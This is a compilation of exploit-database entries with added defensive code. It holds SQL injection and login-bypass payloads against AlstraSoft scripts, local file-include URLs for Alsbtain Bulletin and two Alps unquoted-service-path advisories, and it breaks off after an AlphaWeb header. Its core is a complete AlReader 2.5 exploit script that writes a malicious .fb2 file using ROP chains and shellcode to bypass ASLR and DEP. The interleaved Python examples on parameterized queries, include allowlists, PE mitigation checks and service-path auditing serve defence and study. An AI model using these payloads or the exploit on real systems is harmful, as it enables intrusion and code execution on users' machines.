
# # # # # 
# Exploit Title: Alstrasoft EPay Enterprise v5.17 Script - SQL Injection
# Google Dork: N/A
# Date: 04.02.2017
# Vendor Homepage: http://www.alstrasoft.com/
# Software Buy: http://www.alstrasoft.com/epay_enterprise.htm
# Demo: http://blizsoft.com/enterprise/
# Version: 5.17
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/members/userinfo.htm?id=[SQL]
# http://localhost/[PATH]/members/products.htm?id=[SQL]&action=update
# http://localhost/[PATH]/members/subscriptions.htm?id=[SQL]&action=update
# Authentication Bypass :
# http://localhost/[PATH]/members/login.htm : set Username to 'or''=' and Password to 'or''=' and press Enter.
# # # # #
            
# # # # # 
# Exploit Title: AlstraSoft E-Friends v5.12 Script - SQL Injection
# Google Dork: N/A
# Date: 04.02.2017
# Vendor Homepage: http://www.alstrasoft.com/
# Software Buy: http://www.alstrasoft.com/efriends.htm
# Demo: http://alstrahost.com/friends/
# Version: 5.12
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/index.php?mode=forums&act=viewcat&seid=[SQL]
# http://localhost/[PATH]/index.php?mode=forums&act=viewforum&cats=[SQL]
# http://localhost/[PATH]/index.php?mode=forums&act=viewforum&cats=131&seid=[SQL]
# # # # #
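Both AlstraSoft advisories above come down to the same defect: request values (the id= and seid=/cats= parameters, and the login form fields) are spliced into SQL text. The following is an added example, not code from either advisory or from AlstraSoft; it uses an in-memory sqlite3 table as a constructed stand-in for the members table and shows the same inputs against the concatenated query and against the parameterized one, which is the check a developer or reviewer wants when triaging a finding like this.

```python
import sqlite3


def make_demo_db():
    """Constructed in-memory stand-in for the application's members table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO members (username, password) VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    conn.commit()
    return conn


def login_concatenated(conn, username, password):
    """Vulnerable pattern: request values spliced straight into the SQL text."""
    sql = ("SELECT id FROM members WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn, username, password):
    """Hardened pattern: the driver binds the values, so quotes stay data."""
    sql = "SELECT id FROM members WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def member_by_id_concatenated(conn, id_param):
    """Vulnerable pattern for a numeric ?id= parameter."""
    return [row[0] for row in conn.execute("SELECT username FROM members WHERE id = " + id_param)]


def member_by_id_parameterized(conn, id_param):
    """Hardened: validate the type first, then bind the value."""
    try:
        ident = int(id_param)
    except (TypeError, ValueError):
        return []
    return [row[0] for row in conn.execute("SELECT username FROM members WHERE id = ?", (ident,))]


# The username/password value quoted in the EPay advisory above.
BYPASS = "'or''='"


def run_checks():
    """Run every variant once and return the outcomes for inspection."""
    db = make_demo_db()
    return {
        "valid_login_parameterized": login_parameterized(db, "alice", "s3cret"),
        "bypass_against_concatenated": login_concatenated(db, BYPASS, BYPASS),
        "bypass_against_parameterized": login_parameterized(db, BYPASS, BYPASS),
        "id_or_against_concatenated": member_by_id_concatenated(db, "1 OR 1=1"),
        "id_or_against_parameterized": member_by_id_parameterized(db, "1 OR 1=1"),
        "id_2_parameterized": member_by_id_parameterized(db, "2"),
    }


if __name__ == "__main__":
    for key, value in run_checks().items():
        print(f"{key}: {value}")
```

The concatenated login query turns the bypass value into `username = '' or ''='' AND password = '' or ''=''`, whose trailing `''=''` is always true; the bound version compares the literal string and finds no such user. The same holds for the numeric id parameter, where an integer cast before binding rejects anything that is not a number.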
            
source: https://www.securityfocus.com/bid/50350/info

Alsbtain Bulletin is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.

Alsbtain Bulletin 1.5 and 1.6 are vulnerable; other versions may also be affected. 

http://www.example.com/index.php?style=[LFI]%00
http://www.example.com/index.php?act=[LFI]%00 
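The two request patterns above (style= and act=, each with a trailing %00) describe a classic local file include: the parameter names a file, and the NUL byte cuts off whatever suffix the application appends. The following is an added example, not code from the advisory or from Alsbtain Bulletin, showing the validation an include-style parameter should go through: reject NUL bytes and separators, resolve only names on an allowlist, and confirm the resolved path is still directly under the intended directory. The base directory, parameter names and allowlist values are constructed for the example.

```python
from pathlib import Path
from urllib.parse import unquote

# Constructed allowlist: the only include targets the application legitimately needs.
ALLOWED_INCLUDES = {
    "style": {"default", "dark", "print"},
    "act": {"list", "view", "post"},
}


def resolve_include(base_dir, param_name, value, allowed=ALLOWED_INCLUDES):
    """Map a request parameter such as ?style=dark onto a file under base_dir.

    Returns an absolute Path, or None when the value must be rejected."""
    if not isinstance(value, str):
        return None
    # A NUL terminates the path in C string handling; the %00 in the advisory's
    # request lines relies on exactly that to drop the suffix the application appends.
    if "\x00" in value:
        return None
    # No separators or dot segments: the value is a bare name, never a path.
    if "/" in value or "\\" in value or value in ("", ".", ".."):
        return None
    # The allowlist is the real control; the checks above are defence in depth.
    if value not in allowed.get(param_name, set()):
        return None
    base = Path(base_dir).resolve()
    target = (base / f"{value}.php").resolve()
    # Even an allowlisted name must still land directly inside the base directory.
    if target.parent != base:
        return None
    return target


def resolve_from_query(base_dir, param_name, raw_query_value):
    """Same check, starting from the URL-encoded form seen in the request line."""
    return resolve_include(base_dir, param_name, unquote(raw_query_value))


def include_allowed(base_dir, param_name, raw_query_value):
    """Boolean convenience wrapper for logging or tests."""
    return resolve_from_query(base_dir, param_name, raw_query_value) is not None


if __name__ == "__main__":
    for param, raw in [("style", "dark"), ("style", "../../../../etc/passwd%00"),
                       ("act", "..%2F..%2Fetc%2Fpasswd%00"), ("act", "view")]:
        print(f"{param}={raw!r}: {resolve_from_query('/srv/app/includes', param, raw)}")
```

Decoding happens once, before validation, so an encoded NUL or slash cannot slip past the checks; and because the extension is appended by the server from a fixed allowlist, there is no suffix left for a NUL byte to truncate.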
            
#!/usr/bin/env python

#*************************************************************************************************************
# Exploit Title:          Alreader 2.5 .fb2 SEH Based Stack Overflow (ASLR and DEP bypass)
# Date:                   25.10.2015
# Category:               Local Exploit
# Exploit Author:         g00dv1n
# Contact:                g00dv1n.private@gmail.com
# Version:                2.5
# Tested on:              Windows XP SP3 / Windows 7 / Windows 8 
# Vendor Homepage:        http://www.alreader.com/index.php?lang=en
# Software Link (ENG):    http://www.alreader.com/download.php?file=AlReader2.Win32.en.zip
# Software Link (RU):     http://www.alreader.com/download.php?file=AlReader2.Win32.ru.zip
# CVE: 



# Description:
# AlReader 2.5 is a free FB2 reader for Windows.
# The FB2 format is plain XML. An FB2 file contains an <author> <first-name> </first-name> </author> block.
# The overflow occurs when the author's first name is made long enough.
# The application works with WCHAR (1 char = 2 bytes). If the file is saved as UTF-8, the app widens every single byte into two.
# For example 41 41 becomes 00 41 00 41.
# So the file must be written as UTF-16.
#
# A single null byte can also be used in the payload.
#
# Instructions:
# 1. Run this Python script to generate the AlReader-fb2-PoC-exploit.fb2 file.
# 2. Run Alreader.exe
# 3. Open AlReader-fb2-PoC-exploit.fb2 ( FILE -> Open )
# 4. Enjoy running Calc.exe
#
# Exploit overview:
# To bypass ASLR I used ROP. The main module Alreader2.exe is not ASLR-enabled. It also contains calls to GetModuleHandleW
# and GetProcAddress, so these functions can be used to obtain a pointer to VirtualProtect, make the stack executable and
# run the shellcode.
#
# The overflow overwrites the SEH record, so EIP can be controlled. For this the jump address is sprayed in the payload
# ( the offset must be adjusted on different systems ).
# Then, to regain control of the stack, some value must be added to ESP (ADD ESP, 808h). ESP will then point to the ROP NOPs
# ( the offset must be adjusted on different systems ).
# Control then passes to the ROP chain.
#
# The program has Russian (RU) and English (Eng) versions.
# The ROP chains for them are the same but use different addresses. ( the addresses of ADD ESP, 808h and the ROP NOP are the same for all versions )
# To combine the two versions in one exploit I place two ROP chains one after another.
# In the RU version, when the exception occurs, control passes to the first ROP chain. (ADD ESP, 808h RETN 4, then the ROP NOPs )
# In the Eng version, after ADD ESP, 808h RETN 4 and the ROP NOPs, yet another exception occurs and ADD ESP, 808h is called again.
# So ESP jumps over the first ROP chain; the ROP NOPs correct the offset and the second ROP chain, for the Eng version, gets control.
# With these tricks the exploit works correctly for both versions.
#
# Below is an ASCII diagram of the payload:
#
#                              =-------------------------=
#                              |          gdvn           |        just fan magic bytes       
#                              |-------------------------|                         
#                              |                         |
#                              |   jmp from SEH address  |        x 500    Sprayed address to jump to from the overwritten SEH
#                              |                         |                        (ADD ESP, 808h RETN 4) 
#                              |-------------------------|                         
#                              |                         |
#                              |        ROP NOP          |        x 500    Spray  ROP NOP (RETN)   
#                              |                         |
#                              |-------------------------|                         
#                              |                         |
#                              |      ROP chain for      |
#                              |       RU version        |
#                              |                         |
#                              |-------------------------|                         
#                              |        SHELLCODE        |        Run Calc.exe
#                              |-------------------------|                         
#                              |                         |
#                              |        ROP NOP          |        x 250     Spray  ROP NOP (RETN) 
#                              |                         |
#                              |-------------------------|                         
#                              |                         |
#                              |      ROP chain for      |
#                              |       ENG version       |
#                              |                         |
#                              |-------------------------|                          
#                              |        SHELLCODE        |        Run Calc.exe
#                              |-------------------------|                         
#                              |                         |
#                              |      ROP chain for      |
#                              |       ENG version       |
#                              |                         |
#                              |-------------------------|                          
#                              |                         |
#                              |                         |
#                              |          Junk           |        'A' x 6000
#                              |                         |                         
#                              |                         |
#                              =-------------------------=
#
#
#
# 
#
#**************************************************************************************************************




#######################################################################################################
from struct import *

#######################################################################################################
file_result = "AlReader-fb2-PoC-exploit.fb2"


########################################################################################################

fuz_text  = ''                                # init fuzzy string 




jmp_to  = pack('<I',0x00442391 )              # 0x00442391 ADD ESP, 808h RETN 4

ret_NOP =  pack('<I',0x00448147 )             # RETN


##################################### START CREATE ROP CHAINs ############################################

fuz_text += 'gdvn'                              # magic init bytes



fuz_text += jmp_to * 500                        # spray adr



fuz_text += ret_NOP * 500                       # spray RETN adr



####################################### ROP CHAIN FOR RUS VERSION ########################################

# Prepare to call GetModuleHandleW
# EDI = GetModuleHandleW adr
# ESI = ret adr 
# EBP = ptr to unicode 'kernel32.dll'
                  
ret_adr_after = pack('<I',0x0048ddd1 )          # 0x0048ddd1 :  # ADD ESP,30 # RETN    ( this need to correct ESP )
module_handlew_adr = pack('<I',0x004FC8FC )     # 0x004FC8FC GetModuleHandleW adr
kernel32_u = pack('<I',0x0560944 )              # 0x0560944 ptr to unicode 'kernel32.dll'


#0x004904a6 :  #  POP EDI # POP ESI # POP EBP # POP EBX # RETN 
fuz_text +=  pack('<I',0x004904a6 )   + module_handlew_adr + ret_adr_after + kernel32_u

fuz_text +=  '\x41' *  4

                                                
fuz_text +=  pack('<I',0x004f831c )             # 0x004f831c # ADD ESP,24 # RETN

fuz_text +=  '\x41' *  36

fuz_text += pack('<I',0x004b310d )              # 0x004b310d :  # PUSHAD # RETN

fuz_text +=  '\x41' *  28                       # correct after ADD ESP,30


#Junk
#################################################
fuz_text +=  pack('<I',0x004f831c )             # 0x004f831c # ADD ESP,24 # RETN

fuz_text +=  '\x41' *  36
#################################################

#EAX = kernel32 base adr

# Prepare to call GetProcAddress
# EDI = GetProcAddress adr
# ESI = ret adr 
# EBP = kernel32 base adr
# ESP = ptr to ANSI 'VirtualProtect' followed by a NUL


ret_adr_after = pack('<I',0x0048ddd1 )          # 0x0048ddd1 :  # ADD ESP,30 # RETN    ( this need to correct ESP )             

get_proc_adr  = pack('<I',0x0043C8B2 )          # 0x0043C8B2 - GetProcAddress


# 0x004904A8 : # POP EDI # POP ESI # POP EBP # POP EBX # RETN

fuz_text += pack('<I',0x004904A8 )  + get_proc_adr +  ret_adr_after           

fuz_text +=  '\x41' *  8


fuz_text += pack('<I',0x004b9e9e )             # 0x004b9e9e :  # XCHG EAX,EBP # SETE CL # MOV EAX,ECX # RETN

fuz_text += pack('<I',0x004b310d )             # 0x004b310d :  # PUSHAD # RETN

fuz_text += 'VirtualProtect' + '\x00'

fuz_text +=  '\x41' *  17                      # correct ESP pointer 


########################################################
# Prepare registers for the VirtualProtect call

# EDI = ROP NOP
# ESI = VirtualProtect adr 
# EBP = Ret adr
# ESP = auto
# EBX = 1 
# EDX = 0x40
# ECX = lpOldProtect (ptr to W address)

# Now in EAX VP adr 

fuz_text += pack('<I',0x00489cdd )              # 0x00489cdd,  # PUSH EAX # POP ESI # RETN 

fuz_text += pack('<I',0x004a6392 )              # 0x004a6392,  # POP EBX # RETN 

fuz_text += pack('<I',0x5DE58BD1 )              # 0x5DE58BD1,  # value popped into EBX

fuz_text += pack('<I',0x004e7d31 )              # 0x004e7d31,  # SUB EBX,5DE58BD0 # RETN # EBX = 1

fuz_text += pack('<I',0x004fc23c )              # 0x004fc23c,  # XOR EDX,EDX # RETN  # EDX = 0

fuz_text += pack('<I',0x0040db04 )  * 64        # 0x0040db04,  # INC EDX # ADD AL,3B # RETN x 64 # EDX = 0x40

fuz_text += pack('<I',0x0048c064 )              # 0x0048c064,  # POP ECX # RETN 

fuz_text += pack('<I',0x00629eea )              # 0x00629eea,  # &Writable location 

fuz_text += pack('<I',0x00487d6a )              # 0x00487d6a,  # POP EDI # RETN 

fuz_text += pack('<I',0x004f4401 )              # 0x004f4401,  # RETN (ROP NOP)



fuz_text += pack('<I',0x004e6379 )              # 0x004e6379,  # POP EBP # RETN 

ret_adr_after = pack('<I',0x004f831c )          # ret adr  #  0x004f831c # ADD ESP,24 # RETN


fuz_text += ret_adr_after

fuz_text+= pack('<I',0x004ecfab )               # 0x004ecfab,  # PUSHAD # RETN 

fuz_text +=  '\x41' *  32                       # Correct ESP (padding)



fuz_text += pack('<I',0x004a37bd )              # 0x004a37bd : # jmp esp 

fuz_text += '\x90' * 16                         # NOP's :-)


##################################### END ROP CHAIN #########################################

#############################################################################################
#PASTE SHELLCODE HERE




# Run Calc
shellcode = ("\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
"\x57\x78\x01\xc2\x8b\x7a\x20\x01"
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
"\x45\x81\x3e\x43\x72\x65\x61\x75"
"\xf2\x81\x7e\x08\x6f\x63\x65\x73"
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
"\xb1\xff\x53\xe2\xfd\x68\x63\x61"
"\x6c\x63\x89\xe2\x52\x52\x53\x53"
"\x53\x53\x53\x53\x52\x53\xff\xd7");


fuz_text += shellcode


############################################################################################# 
fuz_text += ret_NOP * 250                       # spray RETN adr

#############################################################################################

############################### ROP CHAIN FOR ENG VERSION ###################################







# Prepare to call GetModuleHandleW
# EDI = GetModuleHandleW adr
# ESI = ret adr 
# EBP = ptr to unicode 'kernel32.dll'
                  
ret_adr_after = pack('<I',0x004cad21 )          # 0x004cad21 :  # ADD ESP,30 # RETN    ( this need to correct ESP )
module_handlew_adr = pack('<I',0x004FC85C )     # 0x004FC85C GetModuleHandleW adr
kernel32_u = pack('<I',0x00560724 )              # 0x00560724  ptr to unicode 'kernel32.dll'


#0x00488ed6 :  # POP EDI # POP ESI # POP EBP # POP EBX # RETN 
fuz_text +=  pack('<I',0x00488ed6 )   + module_handlew_adr + ret_adr_after + kernel32_u

fuz_text +=  '\x41' *  4

                                                
fuz_text +=  pack('<I',0x004a8ee8 )             # 0x004a8ee8 # ADD ESP,24 # RETN

fuz_text +=  '\x41' *  36

fuz_text += pack('<I',0x004b3ded )              # 0x004b3ded :  # PUSHAD # RETN

fuz_text +=  '\x41' *  28                       # correct after ADD ESP,30


#Junk
#################################################
fuz_text +=  pack('<I',0x004a8ee8 )             # 0x004a8ee8 # ADD ESP,24 # RETN

fuz_text +=  '\x41' *  36
#################################################

#EAX = kernel32 base adr

# Prepare to call GetProcAddress
# EDI = GetProcAddress adr
# ESI = ret adr 
# EBP = kernel32 base adr
# ESP = ptr to ANSI 'VirtualProtect' followed by a NUL


ret_adr_after = pack('<I',0x004cad21 )          # 0x004cad21 :  # ADD ESP,30 # RETN    ( this need to correct ESP )             

get_proc_adr  = pack('<I',0x0043C8B2 )          # 0x0043C8B2 - GetProcAddress


# 0x00488ed6 : # POP EDI # POP ESI # POP EBP # POP EBX # RETN

fuz_text += pack('<I',0x00488ed6 )  + get_proc_adr +  ret_adr_after           

fuz_text +=  '\x41' *  8


fuz_text += pack('<I',0x004b9dfe )             # 0x004b9dfe :  # XCHG EAX,EBP # SETE CL # MOV EAX,ECX # RETN

fuz_text += pack('<I',0x004b3ded )             # 0x004b3ded :  # PUSHAD # RETN

fuz_text += 'VirtualProtect' + '\x00'

fuz_text +=  '\x41' *  17                      # correct ESP pointer 


########################################################
# Prepare registers for the VirtualProtect call

# EDI = ROP NOP
# ESI = VirtualProtect adr 
# EBP = Ret adr
# ESP = auto
# EBX = 1 
# EDX = 0x40
# ECX = lpOldProtect (ptr to W address)

# Now in EAX VP adr 

fuz_text += pack('<I',0x00489c3d )              # 0x00489c3d,  # PUSH EAX # POP ESI # RETN 

fuz_text += pack('<I',0x00481c40 )              # 0x00481c40,  # POP EBX # RETN 

fuz_text += pack('<I',0x5DE58BD1 )              # 0x5DE58BD1,  # value popped into EBX

fuz_text += pack('<I',0x004e7c91 )              # 0x004e7c91,  # SUB EBX,5DE58BD0 # RETN # EBX = 1

fuz_text += pack('<I',0x004fc19c )              # 0x004fc19c,  # XOR EDX,EDX # RETN 

fuz_text += pack('<I',0x0040db04 )  * 64        # 0x0040db04,  # INC EDX # ADD AL,3B # RETN x 64 # EDX = 0x40

fuz_text += pack('<I',0x004f39dc )              # 0x004f39dc,  # POP ECX # RETN 

fuz_text += pack('<I',0x0062909d )              # 0x0062909d,  # &Writable location 

fuz_text += pack('<I',0x00495df4 )              # 0x00495df4,  # POP EDI # RETN 

fuz_text += pack('<I',0x00483a02 )              # 0x00483a02,  # RETN (ROP NOP)



fuz_text += pack('<I',0x004fb3c6 )              # 0x004fb3c6,  # POP EBP # RETN 

ret_adr_after = pack('<I',0x004a8ee8 )          # ret adr  #  0x004a8ee8 # ADD ESP,24 # RETN


fuz_text += ret_adr_after

fuz_text+= pack('<I',0x004b3ded )               # 0x004b3ded,  # PUSHAD # RETN 

fuz_text +=  '\x41' *  32                       # Correct ESP (padding)



fuz_text += pack('<I',0x004757a7  )              # 0x004757a7  : # jmp esp 

fuz_text += '\x90' * 16                         # NOP's :-)


fuz_text += shellcode








##############################################################################################
fuz_text += '\x41' * 6000                       # final junk


################################ GENERATE utf-16 fb2 file ####################################

start = '''
<?xml version="1.0" encoding="unicode-utf_16"?>
<FictionBook xmlns="http://www.gribuser.ru/xml/fictionbook/2.0" xmlns:l="http://www.w3.org/1999/xlink">
  <description>
    <title-info>
      <author>
        <first-name> 
    '''

end   = '''
   <middle-name/>
        <last-name/>
      </author>
      <book-title>EXPLOIT TEST</book-title>
	 </title-info>
    </description>
</FictionBook>
'''
start_u = start.encode('utf-16')

end_u = end.encode('utf-16')

fout = open(file_result, 'wb')
fout.write(start_u)
fout.close()

fout = open(file_result,'ab')
fout.write(fuz_text)
fout.close()

fout = open(file_result,'ab')
fout.write(end_u)
fout.close()


print "[*] File successfully created !!\n\n"
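The overview of the AlReader exploit above rests on one property of the target: the main module is not ASLR-enabled, so every gadget address in the chain can be hard-coded, and the stack is made executable at run time because DEP is in force. Whether a binary opts into those mitigations is recorded in the DllCharacteristics field of its PE optional header, and that is the first thing a defender checks when triaging a report like this. The following is an added example, not part of the exploit or of AlReader: a small PE header parser that reports the DYNAMIC_BASE (ASLR), NX_COMPAT (DEP), NO_SEH and GUARD_CF bits, plus a constructed header-only image so it can be exercised offline. The flag values and header offsets are those of the PE/COFF specification; the sample image is not a real executable.

```python
import struct
import sys

# IMAGE_DLLCHARACTERISTICS_* bits from the PE/COFF specification.
DLLCHAR_HIGH_ENTROPY_VA = 0x0020
DLLCHAR_DYNAMIC_BASE = 0x0040    # image may be relocated: ASLR opt-in
DLLCHAR_NX_COMPAT = 0x0100       # image is DEP-compatible
DLLCHAR_NO_SEH = 0x0400          # image declares it contains no SEH handlers
DLLCHAR_GUARD_CF = 0x4000        # Control Flow Guard instrumented

DLLCHAR_OFFSET = 70              # DllCharacteristics sits at +70 in both PE32 and PE32+ optional headers


def pe_mitigations(image: bytes) -> dict:
    """Read DllCharacteristics from a PE image and report the opt-in mitigations.

    Raises ValueError on anything that is not a well-formed PE header."""
    if len(image) < 0x40 or image[:2] != b"MZ":
        raise ValueError("missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                      # IMAGE_FILE_HEADER, 20 bytes
    (opt_size,) = struct.unpack_from("<H", image, coff + 16)
    opt = coff + 20                          # IMAGE_OPTIONAL_HEADER
    if opt_size < DLLCHAR_OFFSET + 2 or len(image) < opt + DLLCHAR_OFFSET + 2:
        raise ValueError("optional header truncated")
    (magic,) = struct.unpack_from("<H", image, opt)
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    (dllchar,) = struct.unpack_from("<H", image, opt + DLLCHAR_OFFSET)
    return {
        "pe32plus": magic == 0x20B,
        "aslr": bool(dllchar & DLLCHAR_DYNAMIC_BASE),
        "high_entropy_va": bool(dllchar & DLLCHAR_HIGH_ENTROPY_VA),
        "dep": bool(dllchar & DLLCHAR_NX_COMPAT),
        "no_seh": bool(dllchar & DLLCHAR_NO_SEH),
        "cfg": bool(dllchar & DLLCHAR_GUARD_CF),
    }


def missing_mitigations(report: dict) -> list:
    """Names of the mitigations an image does not opt into; an empty list is the good case."""
    wanted = [("aslr", "DYNAMIC_BASE (ASLR)"), ("dep", "NX_COMPAT (DEP)"),
              ("no_seh", "NO_SEH"), ("cfg", "GUARD_CF")]
    return [label for key, label in wanted if not report[key]]


def build_test_image(dllchar: int, pe32plus: bool = False) -> bytes:
    """Constructed header-only PE image (not a runnable executable) for offline testing."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    opt_size = 240 if pe32plus else 224
    coff = struct.pack("<HHIIIHH", 0x8664 if pe32plus else 0x14C, 0, 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)
    struct.pack_into("<H", opt, DLLCHAR_OFFSET, dllchar)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    # Usage: python pe_mitigations.py <file.exe>; with no argument, inspect the constructed sample.
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            data = fh.read()
    else:
        data = build_test_image(0x0000)
    report = pe_mitigations(data)
    print(report)
    print("missing:", missing_mitigations(report) or "none")
```

An image with DYNAMIC_BASE clear is exactly the case the exploit above depends on; NO_SEH set, or an image that opts into SafeSEH through its load configuration, is what makes the overwritten handler unusable. Note that this reads the image's declared flags only: a system-wide policy (for example forcing ASLR or DEP for all processes) can apply a mitigation the header does not ask for.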
            
# Exploit Title: Alps Pointing-device Controller 8.1202.1711.04 - 'ApHidMonitorService' Unquoted Service Path
# Date: 2019-11-12
# Exploit Author: Mario Rodriguez
# Vendor Homepage: https://www.alps.com/e/
# Software Link: https://www.alps.com/e/
# Version: 8.1202.1711.04
# Tested on: Windows 10 Home x64 Spanish

#The Alps Pointing-device controller installs a service with an unquoted path
#which could be used as a local privilege escalation vulnerability. To exploit this vulnerability,
#an executable file could be placed in the path of the service and after rebooting the system or
#restarting the service the malicious code will be executed with elevated privileges.

#Step to discover the vulnerability

C:\Users\user>wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
Alps HID Monitor Service    ApHidMonitorService     C:\Program Files\Apoint2K\HidMonitorSvc.exe     Auto

C:\Users\user>sc qc ApHidMonitorService
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: ApHidMonitorService
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files\Apoint2K\HidMonitorSvc.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Alps HID Monitor Service
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem
            
# Exploit Title: Alps HID Monitor Service 8.1.0.10 - 'ApHidMonitorService' Unquoted Service Path
# Date: 2019-11-07
# Exploit Author: Héctor Gabriel Chimecatl Hernández
# Vendor Homepage: https://www.alps.com/e/
# Software Link: https://www.alps.com/e/
# Version: 8.1.0.10
# Tested on: Windows 10 Home Single Language x64 Esp

# Step to discover the unquoted Service:

C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

# Service info:

Alps HID Monitor Service	ApHidMonitorService	C:\Program Files\Apoint2K\HidMonitorSvc.exe	Auto

C:\Users\user>sc qc ApHidMonitorService
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: ApHidMonitorService
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files\Apoint2K\HidMonitorSvc.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Alps HID Monitor Service
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem
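Both Alps entries above find the same condition with the same wmic pipeline: an auto-start service whose binary path contains spaces and is not wrapped in quotes. The following is an added example, not code from either advisory or from Alps: it parses the fixed-width table that `wmic service get name,displayname,pathname,startmode` prints, applies the same test the advisories apply by hand, and produces the quoted path that fixes each finding. The sample output is constructed to mirror the rows shown above (the Alps row is the page's own; the other services are invented).

```python
import re


def parse_wmic_table(text):
    """Parse the fixed-width table printed by 'wmic service get ...'.

    Column starts are taken from the header line, so values that contain
    spaces (display names, paths with arguments) survive intact."""
    lines = [ln.rstrip("\r") for ln in text.splitlines() if ln.strip()]
    header = lines[0]
    columns = [(m.group(0), m.start()) for m in re.finditer(r"\S+", header)]
    rows = []
    for ln in lines[1:]:
        row = {}
        for i, (name, start) in enumerate(columns):
            end = columns[i + 1][1] if i + 1 < len(columns) else len(ln)
            row[name] = ln[start:end].strip()
        rows.append(row)
    return rows


def executable_part(pathname):
    """Split an unquoted command line into (image path, trailing arguments),
    assuming the image path ends at the first '.exe'."""
    m = re.match(r"(.*?\.exe)(.*)$", pathname, re.IGNORECASE)
    if not m:
        return pathname, ""
    return m.group(1), m.group(2)


def is_unquoted_with_spaces(pathname):
    """The condition the advisories test for: no leading quote and a space inside the image path."""
    p = pathname.strip()
    if not p or p.startswith('"'):
        return False
    exe, _ = executable_part(p)
    return " " in exe


def quoted_pathname(pathname):
    """Remediated value: the image path quoted, arguments left as they were."""
    exe, rest = executable_part(pathname.strip())
    return f'"{exe}"{rest}'


def audit_services(wmic_text, skip_windows_dir=True):
    """Return one finding per service with an unquoted, space-containing image path."""
    findings = []
    for row in parse_wmic_table(wmic_text):
        path = row.get("PathName", "")
        if skip_windows_dir and path.lower().startswith("c:\\windows\\"):
            continue                       # same exclusion the advisories' findstr applies
        if is_unquoted_with_spaces(path):
            findings.append({
                "name": row["Name"],
                "start_mode": row["StartMode"],
                "pathname": path,
                "fixed_pathname": quoted_pathname(path),
            })
    return findings


def _row(display, name, path, mode):
    """Lay out one line the way wmic pads its columns (used only to build the sample)."""
    return f"{display:<28}{name:<22}{path:<72}{mode}"


# Constructed sample of wmic output; only the Alps row is taken from the advisories above.
SAMPLE_WMIC_OUTPUT = "\n".join([
    _row("DisplayName", "Name", "PathName", "StartMode"),
    _row("Alps HID Monitor Service", "ApHidMonitorService",
         r"C:\Program Files\Apoint2K\HidMonitorSvc.exe", "Auto"),
    _row("Foo Agent", "FooAgent",
         r"C:\Program Files\Foo\agent.exe --log C:\ProgramData\Foo\agent.log", "Auto"),
    _row("Good Service", "GoodSvc", r'"C:\Program Files\Good\svc.exe" -run', "Auto"),
    _row("Windows Update", "wuauserv", r"C:\Windows\system32\svchost.exe -k netsvcs -p", "Manual"),
])


if __name__ == "__main__":
    for f in audit_services(SAMPLE_WMIC_OUTPUT):
        print(f"{f['name']} ({f['start_mode']}): {f['pathname']}")
        print(f"    fix: sc config {f['name']} binPath= '{f['fixed_pathname']}'")
```

The remediation is to rewrite the service's binary path with the image path quoted, for example `sc config ApHidMonitorService binPath= "\"C:\Program Files\Apoint2K\HidMonitorSvc.exe\""` from an elevated prompt (the inner quotes must be escaped for sc). A service that already starts with a quote, like GoodSvc in the sample, is not flagged even though its path contains spaces.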
            
# Exploit Title: AlphaWeb XE - File Upload Remote Code Execution (RCE) (Authenticated)
# Date: 09/09/2021
# Exploit Author: Ricardo Ruiz (@ricardojoserf)
